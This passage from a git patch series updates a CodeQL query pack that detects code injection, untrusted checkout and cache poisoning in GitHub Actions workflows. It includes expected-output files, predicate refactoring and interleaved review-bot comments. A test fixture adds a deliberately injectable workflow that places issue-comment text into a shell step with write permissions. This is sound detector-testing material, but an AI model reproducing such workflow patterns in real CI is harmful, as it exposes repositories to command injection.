"$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label 
| github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml new file mode 100644 index 000000000000..b9b861bd060c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml @@ -0,0 +1,13 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo '${{ toJSON(github.event.comment.body).foo }}' + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index ac4761deda1f..484121163634 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -234,6 +234,7 @@ nodes | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -330,6 +331,7 @@ subpaths | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index c69af0316bf5..d577e2fd732b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -234,6 +234,7 @@ nodes | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 842b741611788964c82caad40ce785ff56305c3b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 16:02:51 +0200 Subject: [PATCH 311/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2736e30331c2..84f18e2b5210 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.30 +version: 0.0.31 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 451b49ec07e9..4a196108be6b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.30 +version: 0.0.31 groups: - actions - queries From 844b6e014bb6aef8c48ba86caba0ed3f34b95480 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 19:04:32 +0200 Subject: [PATCH 312/707] Bump qlpack versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++++--- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../CWE-829/UntrustedCheckoutCritical.expected | 2 -- .../Security/CWE-829/UntrustedCheckoutMedium.expected | 2 ++ 5 files changed, 11 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1094a152126b..2b15061be3d4 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -818,8 +818,9 @@ class JobImpl extends AstNodeImpl, TJobNode { } private predicate hasPrivilegedTrigger() { - // the Job is triggered by an event other than `pull_request` + // the Job is triggered by an event other than `pull_request`, `push`, or `workflow_call` count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent().getName() = "push" and not this.getATriggerEvent().getName() = "pull_request" and not this.getATriggerEvent().getName() = "workflow_call" or @@ -832,8 +833,11 @@ class JobImpl extends AstNodeImpl, TJobNode { not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) ) or - // the Workflow has multiple triggers so at least one is not "pull_request" - count(this.getATriggerEvent()) > 1 + // the Job is triggered by an event other than `push`, `pull_request`, or `workflow_call` + exists(string event | + this.getATriggerEvent().getName() = event and + not event = ["push", "pull_request", "workflow_call"] + ) } /** Gets the trigger event that starts this workflow. */ diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 84f18e2b5210..9acfb3035a41 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.31 +version: 0.0.32 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 
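Review bot: In hasPrivilegedTrigger the first disjunct (`count(this.getATriggerEvent()) = 1 and not ... "push"/"pull_request"/"workflow_call"`) is now subsumed by the added third disjunct, which holds whenever any trigger event's name is outside `["push", "pull_request", "workflow_call"]` regardless of the count, so the single-trigger branch can be deleted and only the `exists(string event | ...)` form kept. Both branches also carry the same comment, "the Job is triggered by an event other than ...", which hides that they differ only in the count restriction. Adding `push` to the exclusion list changes which jobs count as privileged; a one-line comment saying why `push` is grouped with `pull_request` here would spare the next reader a bisect. The enclosing class JobImpl extends beyond the hunk.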
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4a196108be6b..5637bef68a03 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.31 +version: 0.0.32 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2660a726ab6f..1f90c56607df 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,7 +1,5 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index e69de29bb2d1..9adfa3cee7cc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -0,0 +1,2 @@ +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 88465bd0e350b1da1ff468a96af6d04f85a86dab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 11:26:51 +0200 Subject: [PATCH 313/707] Improve privleged detection --- ql/lib/codeql/actions/Ast.qll | 12 +- ql/lib/codeql/actions/Helper.qll | 46 +--- ql/lib/codeql/actions/ast/internal/Ast.qll | 209 ++++++++++-------- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 2 +- .../CWE-094/CodeInjectionCritical.expected | 1 - .../CWE-094/CodeInjectionMedium.expected | 1 + 7 files changed, 138 insertions(+), 135 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 9be2580f36e9..e837c6fcb303 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -77,6 +77,8 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { LocalJob getACaller() { result = super.getACaller() } predicate isPrivileged() { super.isPrivileged() } + + predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } /** @@ -169,6 +171,10 @@ class Event extends AstNode instanceof EventImpl { string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } predicate hasProperty(string prop) { super.hasProperty(prop) } + + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + + predicate isPrivileged() { super.isPrivileged() } } /** 
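Review bot: The two predicates added to the public Event class, `isExternallyTriggerable()` and `isPrivileged()`, carry no QLDoc, and the names alone do not convey the non-obvious `workflow_call` handling in the implementation, where an event with no discoverable caller is treated as privileged. Suggested doc lines: `/** Holds if the event can be triggered by an external actor, including a `workflow_call` whose caller workflow is externally triggered. */` and `/** Holds if the event is not `pull_request`/`workflow_call`, or is a `workflow_call` with a privileged or unknown caller. */`. The new `isPrivilegedExternallyTriggerable()` on CompositeAction in the first hunk would benefit from the same treatment, since the neighbouring `isPrivileged()` is equally undocumented.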
@@ -198,11 +204,11 @@ abstract class Job extends AstNode instanceof JobImpl { Strategy getStrategy() { result = super.getStrategy() } - predicate isPrivileged() { super.isPrivileged() } + string getARunsOnLabel() { result = super.getARunsOnLabel() } - predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + predicate isPrivileged() { super.isPrivileged() } - string getARunsOnLabel() { result = super.getARunsOnLabel() } + predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } class LocalJob extends Job instanceof LocalJobImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 563a9800214e..401ba89eca77 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
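Review bot: This hunk removes `isExternallyTriggerable()` from the public Job class without a replacement, so any downstream query that called `j.isExternallyTriggerable()` stops compiling; the in-tree callers are migrated to `j.getATriggerEvent().isExternallyTriggerable()` in CachePoisoning.ql and CachePoisoningByCodeInjection.ql later in this commit, but the diffstat shows no qlpack.yml bump, unlike the two preceding commits. Keeping a forwarding predicate avoids the break: `predicate isExternallyTriggerable() { this.getATriggerEvent().isExternallyTriggerable() }`. If the removal is intentional, a version bump and a changelog line would signal the API change.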
@@ -210,54 +210,28 @@ predicate writeToGitHubPath(Run run, string content) { predicate inPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | - // node is in a privileged composite action a = node.getEnclosingCompositeAction() and - ( - a.isPrivileged() - or - exists(Job caller | - caller = a.getACaller() and - caller.isPrivileged() and - caller.isExternallyTriggerable() - ) - ) - ) -} - -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - // node is in a privileged and externally triggereable job - j = node.getEnclosingJob() and - // job is privileged (write access or access to secrets) - j.isPrivileged() and - // job is triggereable by an external user - j.isExternallyTriggerable() + a.isPrivilegedExternallyTriggerable() ) } predicate inNonPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | - // node is in a non-privileged composite action a = node.getEnclosingCompositeAction() and - not a.isPrivileged() and - not exists(LocalJob caller | - caller = a.getACaller() and - caller.isPrivileged() and - caller.isExternallyTriggerable() - ) + not a.isPrivilegedExternallyTriggerable() + ) +} + +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + j = node.getEnclosingJob() and + j.isPrivilegedExternallyTriggerable() ) } predicate inNonPrivilegedJob(AstNode node) { exists(Job j | - // node is in a non-privileged or not externally triggereable job j = node.getEnclosingJob() and - ( - // job is non-privileged (no write access and no access to secrets) - not j.isPrivileged() - or - // job is triggereable by an external user - not j.isExternallyTriggerable() - ) + not j.isPrivilegedExternallyTriggerable() ) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2b15061be3d4..e31edf7900af 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
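Review bot: `inNonPrivilegedJob` and `inNonPrivilegedCompositeAction` now hold for any job or action that is not both privileged and externally triggerable, which includes fully privileged jobs on non-external triggers, and the inline comments that used to spell this out are removed while the names still suggest only the permission part. Suggested QLDoc on each, e.g. `/** Holds if `node` is in a job that is not privileged or not externally triggerable. */`. Note also that `inNonPrivilegedJob(node)` is not the negation of `inPrivilegedExternallyTriggerableJob(node)`: both are wrapped in `exists(Job j | j = node.getEnclosingJob() ...)`, so a node with no enclosing job satisfies neither; worth stating in the doc if callers use them as complements.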
@@ -317,6 +317,18 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } + private predicate hasExplicitSecretAccess() { + // the job accesses a secret other than GITHUB_TOKEN + exists(SecretsExpressionImpl expr | + expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + } + + private predicate hasExplicitWritePermission() { + // a calling job has an explicit write permission + this.getACaller().getPermissions().getAPermission().matches("%write") + } + /** Holds if the action is privileged. */ predicate isPrivileged() { // there is a calling job that defines explicit write permissions @@ -326,19 +338,24 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { this.hasExplicitSecretAccess() or // there is a privileged caller job - this.getACaller().isPrivileged() - } - - private predicate hasExplicitSecretAccess() { - // the job accesses a secret other than GITHUB_TOKEN - exists(SecretsExpressionImpl expr | - expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ( + this.getACaller().isPrivileged() + or + not this.getACaller().isPrivileged() and + this.getACaller().getATriggerEvent().isPrivileged() ) } - private predicate hasExplicitWritePermission() { - // a calling job has an explicit write permission - this.getACaller().getPermissions().getAPermission().matches("%write") + /** Holds if the action is privileged and externally triggerable. */ + predicate isPrivilegedExternallyTriggerable() { + // the action is externally triggerable + exists(JobImpl caller, EventImpl event | + caller = this.getACaller() and + event = caller.getATriggerEvent() and + event.isExternallyTriggerable() and + // the action is privileged + (this.isPrivileged() or caller.isPrivileged()) + ) } } 
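Review bot: In the new CompositeActionImpl.isPrivileged branch `not this.getACaller().isPrivileged() and this.getACaller().getATriggerEvent().isPrivileged()`, `getACaller()` is multi-valued, so the negation quantifies over all callers while the conjunct only needs one; together with the preceding disjunct `this.getACaller().isPrivileged()` the block reduces to `this.getACaller().isPrivileged() or this.getACaller().getATriggerEvent().isPrivileged()`, and the same redundant `X or (not X and Y)` shape appears in JobImpl.isPrivilegedExternallyTriggerable at the end of this commit. More importantly, trigger-derived privilege is now applied regardless of declared permissions, whereas the removed JobImpl.isPrivileged only consulted the trigger when `not exists(this.getPermissions()) and not exists(this.getEnclosingWorkflow().getPermissions())`; as far as this hunk shows, a caller job on `issue_comment` that declares a read-only `permissions:` block will now be reported as privileged, here and in the JobImpl version. Restoring that guard on the trigger branch, e.g. `not exists(caller.getPermissions()) and not exists(caller.getEnclosingWorkflow().getPermissions()) and caller.getATriggerEvent().isPrivileged()` with `caller` bound to `this.getACaller()`, keeps explicit read-only permissions authoritative. The enclosing class continues outside the hunk.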
@@ -688,6 +705,42 @@ class EventImpl extends AstNodeImpl, TEventNode {
 
 /** Holds if the event has a property with the given name */
 predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) }
+
+ /** Holds if the event can be triggered by an external actor. */
+ predicate isExternallyTriggerable() {
+ // the job is triggered by an event that can be triggered externally
+ externallyTriggerableEventsDataModel(this.getName())
+ or
+ // the event is `workflow_call` and there is a caller workflow that can be triggered externally
+ this.getName() = "workflow_call" and
+ (
+ // there are hints that this workflow is meant to be called by external triggers
+ exists(ExpressionImpl expr, string external_trigger |
+ expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and
+ expr.getExpression().matches("%github.event" + external_trigger + "%") and
+ externallyTriggerableEventsDataModel(external_trigger)
+ )
+ or
+ this.getEnclosingWorkflow()
+ .(ReusableWorkflowImpl)
+ .getACaller()
+ .getATriggerEvent()
+ .isExternallyTriggerable()
+ )
+ }
+
+ predicate isPrivileged() {
+ // the Job is triggered by an event other than `pull_request`, or `workflow_call`
+ not this.getName() = "pull_request" and
+ not this.getName() = "workflow_call"
+ or
+ // Reusable Workflow with a privileged caller or we cant find a caller
+ this.getName() = "workflow_call" and
+ (
+ this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or
+ not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller())
+ )
+ }
 }
 
 class JobImpl extends AstNodeImpl, TJobNode {
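Review bot: The hint pattern in isExternallyTriggerable, `"%github.event" + external_trigger + "%"`, has no separator between `github.event` and the event name, so for a data-model name such as `issue_comment` it searches for the literal text `github.eventissue_comment`; unless the data model stores names with a leading dot, no workflow expression will contain that and the hint branch is dead (the pattern is inherited from the removed JobImpl version rather than introduced here). If the intended spelling is `github.event.<name>` the fix is `"%github.event." + external_trigger + "%"`, though payload keys such as `github.event.comment` differ from event names, so it is worth confirming what spelling the hint is meant to catch. Separately, isPrivileged's comment and code exclude only `pull_request` and `workflow_call`, while the JobImpl.hasPrivilegedTrigger it replaces had just been extended to exclude `push`; if re-including `push` is deliberate, say so in the comment, and the first comment in isExternallyTriggerable should say "the event" rather than "the job" now that this is an Event predicate.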
@@ -746,45 +799,41 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - /** Holds if the job can be triggered by an external actor. */ - predicate isExternallyTriggerable() { - // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) - or - // the job is triggered by a workflow_call event that can be triggered externally - this.getATriggerEvent().getName() = "workflow_call" and - ( - exists(ExpressionImpl e, string external_trigger | - e.getEnclosingJob() = this and - e.getExpression().matches("%github.event" + external_trigger + "%") and - externallyTriggerableEventsDataModel(external_trigger) + /** Gets the trigger event that starts this workflow. */ + EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + + // private predicate hasSingleTrigger(string trigger) { + // this.getATriggerEvent().getName() = trigger and + // count(this.getATriggerEvent()) = 1 + // } + /** Gets the runs-on field of the job. */ + string getARunsOnLabel() { + exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | + runson = n.lookup("runs-on").(YamlMappingLikeNode) + | + ( + lbl.getNode() = runson.getNode(_) and + not lbl.getNode() = runson.getNode("group") + or + lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) + ) and + ( + not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and + result = + lbl.getValue() + .trim() + .regexpReplaceAll("^('|\")", "") + .regexpReplaceAll("('|\")$", "") + .trim() + or + exists(MatrixExpressionImpl e | + e.getParentNode() = lbl and + result = e.getLiteralValues() + ) ) - or - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable() ) } - /** Holds if the job is privileged. 
*/ - predicate isPrivileged() { - // the job has privileged runtime permissions - this.hasRuntimeWritePermissions() - or - // the job has an explicit secret accesses - this.hasExplicitSecretAccess() - or - // the job has an explicit write permission - this.hasExplicitWritePermission() - or - // the job has no explicit permissions but the workflow has write permissions - not exists(this.getPermissions()) and - this.hasImplicitWritePermission() - or - // neither the job nor the workflow have permissions but the job has a privileged trigger - not exists(this.getPermissions()) and - not exists(this.getEnclosingWorkflow().getPermissions()) and - this.hasPrivilegedTrigger() - } - private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | 
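Review bot: The commented-out `hasSingleTrigger` predicate is carried along in this move as dead code; with the `count(...) = 1` logic removed from the class in the next hunk it has no remaining purpose and should be deleted rather than relocated. The QLDoc on the moved `getATriggerEvent`, `/** Gets the trigger event that starts this workflow. */`, is misleading on a Job method whose result is multi-valued; `/** Gets a trigger event of the enclosing workflow. */` matches the `getA` naming. The enclosing class JobImpl continues past the hunk.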
@@ -817,60 +866,34 @@ class JobImpl extends AstNodeImpl, TJobNode { ) } - private predicate hasPrivilegedTrigger() { - // the Job is triggered by an event other than `pull_request`, `push`, or `workflow_call` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent().getName() = "push" and - not this.getATriggerEvent().getName() = "pull_request" and - not this.getATriggerEvent().getName() = "workflow_call" + /** Holds if the job is privileged. */ + predicate isPrivileged() { + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() or - // the Workflow is a Reusable Workflow only and there is - // a privileged caller workflow or we cant find a caller - count(this.getATriggerEvent()) = 1 and - this.getATriggerEvent().getName() = "workflow_call" and - ( - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or - not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) - ) + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() or - // the Job is triggered by an event other than `push`, `pull_request`, or `workflow_call` - exists(string event | - this.getATriggerEvent().getName() = event and - not event = ["push", "pull_request", "workflow_call"] - ) + // the job has an explicit write permission + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() } - /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - - // private predicate hasSingleTrigger(string trigger) { - // this.getATriggerEvent().getName() = trigger and - // count(this.getATriggerEvent()) = 1 - // } - /** Gets the runs-on field of the job. 
*/ - string getARunsOnLabel() { - exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | - runson = n.lookup("runs-on").(YamlMappingLikeNode) - | + /** Holds if the action is privileged and externally triggerable. */ + predicate isPrivilegedExternallyTriggerable() { + exists(EventImpl e | + // job is triggereable by an external user + this.getATriggerEvent() = e and + e.isExternallyTriggerable() and + // job is privileged (write access or access to secrets) ( - lbl.getNode() = runson.getNode(_) and - not lbl.getNode() = runson.getNode("group") + this.isPrivileged() or - lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) - ) and - ( - not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and - result = - lbl.getValue() - .trim() - .regexpReplaceAll("^('|\")", "") - .regexpReplaceAll("('|\")$", "") - .trim() - or - exists(MatrixExpressionImpl e | - e.getParentNode() = lbl and - result = e.getLiteralValues() - ) + not this.isPrivileged() and + e.isPrivileged() ) ) } diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 80ebd92c5d31..d81c13021c17 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -24,7 +24,7 @@ where // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and // job can be triggered by an external user - j.isExternallyTriggerable() and + j.getATriggerEvent().isExternallyTriggerable() and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 1c13497ddaf2..5ed3c966ad31 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql 
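Review bot: The QLDoc on the new JobImpl.isPrivilegedExternallyTriggerable, `/** Holds if the action is privileged and externally triggerable. */`, is copied from the CompositeActionImpl version and should read `job`, e.g. `/** Holds if the job is privileged and can be triggered by an external actor. */`. The inline comment `// job is privileged (write access or access to secrets)` no longer describes the branch beneath it, which also accepts a non-privileged job whose trigger event is privileged; `// job is privileged, or its trigger event is privileged` is accurate. JobImpl.isPrivileged loses its trigger-based branch here, so its doc `/** Holds if the job is privileged. */` could state that trigger-derived privilege now lives in EventImpl.isPrivileged, which is what the two callers in this commit rely on. The class continues outside the hunk.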
